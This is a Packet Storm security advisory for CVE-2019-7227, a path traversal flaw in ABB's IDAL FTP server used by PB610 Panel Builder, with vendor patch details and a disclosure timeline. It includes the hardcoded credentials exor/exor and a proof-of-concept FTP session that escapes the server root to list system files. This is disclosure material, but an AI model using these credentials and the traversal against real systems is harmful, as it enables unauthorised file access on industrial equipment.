exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ABB IDAL FTP Server Path Traversal

ABB IDAL FTP Server Path Traversal
Posted Jun 21, 2019
Authored by Eldar Marcussen

The IDAL FTP server fails to ensure that directory change requests do not change to locations outside of the FTP servers root directory. An authenticated attacker can simply traverse outside the server root directory by changing the directory with "cd ..". An authenticated attacker can traverse to arbitrary directories on the hard disk and then use the FTP server functionality to download and upload files. An unauthenticated attacker can take advantage of the hardcoded or default credential pair exor/exor to become an authenticated attacker.

tags | exploit, arbitrary, root
advisories | CVE-2019-7227
SHA-256 | 00c2ac3a1ecb33776d1003c082f02f6355b49f02e6dd423c518718f20b434e76

ABB IDAL FTP Server Path Traversal

Change Mirror Download
XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
========================================================================

Identifiers
-----------
XL-19-008
CVE-2019-7227
ABBVU-IAMF-1902006


CVSS Score
----------
7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)


Affected vendor
---------------
ABB (new.abb.com)


Credit
------
Eldar Marcussen - xen1thLabs - Software Labs


Vulnerability summary
---------------------
The IDAL FTP server fails to ensure that directory change requests do not change to locations outside of the FTP servers root directory. An authenticated attacker can simply traverse outside the server root directory by changing the directory with "cd ..".


Technical details
-----------------
An authenticated attacker can traverse to arbitrary directories on the hard disk and then use the FTP server functionality to download and upload files. An unauthenticated attacker can take advantage of the hardcoded or default credential pair exor/exor to become an authenticated attacker.

Proof of concept
----------------
```
ftp> open localhost 22
Connected to WIN-542AQUCL4LD.
220 Welcome to IDAL FTP server. READY.
User (WIN-542AQUCL4LD:(none)): exor
331 User name ok, need password.
Password:
230 User successfully logged in.
550 CWD command failed. Directory not found.
ftp> cd ../../../../../../../../../../../../../../../
250 CWD command successful.
ftp> dir
200 PORT command successful.ac
150 Opening ASCII mode data connection for LIST.
drwxrwxrwx 1 0 0 0 Dec 11 05:45 $Recycle.Bin
-rwxrwxrwx 1 0 0 24 Jun 10 2009 autoexec.bat
drwxrwxrwx 1 0 0 0 Dec 11 16:41 Boot
-r--r--r-- 1 0 0 383562 Jul 14 2009 bootmgr
-r--r--r-- 1 0 0 8192 Dec 11 16:41 BOOTSECT.BAK
-rw-rw-rw- 1 0 0 10 Jun 10 2009 config.sys
drwxrwxrwx 1 0 0 0 Jul 14 2009 Documents and Settings
-rw-rw-rw- 1 0 0 -1074274304 Dec 11 12:36 pagefile.sys
drwxrwxrwx 1 0 0 0 Jul 14 2009 PerfLogs
dr-xr-xr-x 1 0 0 0 Dec 11 11:42 Program Files
drwxrwxrwx 1 0 0 0 Dec 11 12:36 ProgramData
drwxrwxrwx 1 0 0 0 Dec 11 05:44 Recovery
-rw-rw-rw- 1 0 0 213 Dec 11 07:23 setup.log
drwxrwxrwx 1 0 0 0 Dec 11 12:26 System Volume Information
dr-xr-xr-x 1 0 0 0 Dec 11 05:44 Users
drwxrwxrwx 1 0 0 0 Dec 11 07:20 Windows
226 Transfer complete.
ftp: 1009 bytes received in 0.01Seconds 100.90Kbytes/sec.
ftp>
```

Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367

Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch


Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close